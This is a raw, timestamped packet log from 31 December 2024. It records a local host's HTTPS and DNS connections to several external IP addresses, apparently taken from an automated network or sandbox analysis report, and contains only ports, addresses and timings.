Dec 31, 2024 16:57:42.342103958 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.342169046 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.342381001 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.342396975 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.409476042 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.409533024 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.409744978 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.410012960 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.410026073 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.538117886 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.538140059 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.538211107 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.538383007 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.538395882 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.692018986 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.692662001 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.692691088 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.693732977 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.693813086 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.694926977 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.694994926 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.695097923 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.695106030 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.737785101 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.997062922 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997144938 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997229099 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.997236967 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997443914 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997468948 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997488976 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:42.997498035 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:42.997544050 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.000534058 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.004175901 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.004240036 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.004436016 CET	49751	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.004442930 CET	443	49751	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.068707943 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.068716049 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.068922997 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.068943977 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.069113016 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.069161892 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.069958925 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.070023060 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070216894 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.070266008 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070401907 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070460081 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.070693016 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070756912 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.070880890 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070887089 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.070986986 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.070993900 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.117865086 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.117867947 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.165707111 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.166666985 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.166706085 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.167774916 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.167838097 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.168220997 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.168288946 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.212677002 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.212685108 CET	443	49754	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.259655952 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.369515896 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.369972944 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.370038033 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.371037960 CET	49752	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.371049881 CET	443	49752	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380542040 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380588055 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380623102 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380651951 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380686045 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380686045 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.380713940 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.380728006 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.380754948 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.380762100 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.384434938 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.384488106 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.384500980 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.390678883 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.390739918 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.390769005 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.431065083 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.431072950 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.467077017 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.467102051 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.467130899 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.467140913 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.467181921 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.470060110 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.476406097 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.476460934 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.476466894 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.482646942 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.482719898 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.482774019 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.482781887 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.482821941 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.489012003 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.495304108 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.495331049 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.495399952 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.495409966 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.495455027 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.501121998 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.507106066 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.507132053 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.507153034 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.507160902 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.507203102 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.513109922 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.518825054 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.518861055 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.518899918 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.518906116 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.518950939 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.524985075 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.554547071 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.554600000 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.554630041 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.554637909 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.554647923 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.554687023 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.555001974 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.555052996 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.555058956 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.557625055 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.557652950 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.557706118 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.557713032 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.557754993 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.563390017 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.568253994 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.568399906 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.568468094 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.568483114 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.568533897 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.574208021 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.579899073 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.579933882 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.579945087 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.579951048 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.580065966 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.585763931 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.591422081 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.591464996 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.591494083 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.591501951 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.591542006 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.596915960 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.602448940 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.602581024 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.602637053 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.602643967 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.602683067 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.607836008 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.612867117 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.613010883 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.613017082 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.617646933 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.617681026 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.617727041 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.617734909 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.617772102 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.622003078 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.626204014 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.626246929 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.626255035 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.630330086 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.630453110 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.630518913 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.630525112 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.630568027 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.634788990 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.638382912 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.638438940 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.638444901 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.642345905 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.642373085 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.642395020 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.642402887 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.642467976 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.646387100 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.646466970 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.647209883 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.647216082 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.650352955 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.651371956 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.651377916 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.652748108 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.652796030 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.652801991 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.655106068 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.655157089 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.655162096 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.657396078 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.657440901 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.657448053 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.659727097 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.659771919 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.659778118 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.662089109 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.662132025 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.662137985 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.664887905 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.664935112 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.664941072 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.667922020 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.667967081 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.667977095 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.670299053 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.670346022 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.670351982 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.672163010 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.672208071 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.672214031 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.673820972 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:43.673871040 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.673995018 CET	49753	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:43.674009085 CET	443	49753	172.217.16.196	192.168.2.4
Dec 31, 2024 16:57:46.938890934 CET	51506	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.943708897 CET	53	51506	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:46.943793058 CET	51506	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.943955898 CET	51506	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:46.948693991 CET	53	51506	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:47.005496979 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.005525112 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.005584955 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.005831003 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.005845070 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.350723028 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:47.350764990 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:47.350862026 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:47.351099014 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:47.351111889 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:47.394001007 CET	53	51506	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:47.394973040 CET	51506	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:47.400286913 CET	53	51506	1.1.1.1	192.168.2.4
Dec 31, 2024 16:57:47.400362968 CET	51506	53	192.168.2.4	1.1.1.1
Dec 31, 2024 16:57:47.658786058 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.659421921 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.659435034 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.659791946 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.659851074 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.660511971 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.660551071 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.714039087 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.714186907 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.714206934 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.714242935 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.714272022 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.759545088 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.759552002 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.806421041 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.935838938 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.936839104 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:47.936892986 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.953691959 CET	51507	443	192.168.2.4	142.250.181.238
Dec 31, 2024 16:57:47.953701019 CET	443	51507	142.250.181.238	192.168.2.4
Dec 31, 2024 16:57:48.027653933 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.027719975 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.028259039 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.028268099 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.029972076 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.029977083 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.428939104 CET	49754	443	192.168.2.4	172.217.16.196
Dec 31, 2024 16:57:48.471328974 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.471344948 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.471446991 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.471752882 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.471764088 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.851054907 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.851126909 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:48.851146936 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.851174116 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.851957083 CET	51510	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:48.851973057 CET	443	51510	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.119817972 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.119915962 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.120654106 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.120666981 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122307062 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122311115 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122389078 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122404099 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122409105 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122412920 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122545004 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122549057 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122636080 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122646093 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122659922 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122668982 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122699022 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122704029 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122828007 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122838974 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.122989893 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.122997999 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123018980 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123027086 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123048067 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123054028 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123070955 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123085976 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123173952 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123181105 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123207092 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123213053 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123231888 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123243093 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123260021 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123276949 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123295069 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123301983 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.123317957 CET	51512	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.123321056 CET	443	51512	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.478949070 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.479065895 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:49.479224920 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.479600906 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:49.479636908 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.131537914 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.131613970 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.132126093 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.132155895 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.134180069 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.134192944 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.134310961 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.134357929 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.134499073 CET	51513	443	192.168.2.4	116.203.14.4
Dec 31, 2024 16:57:50.134531975 CET	443	51513	116.203.14.4	192.168.2.4
Dec 31, 2024 16:57:50.134620905 CET	51513	443	192.168.2.4	116.203.14.4
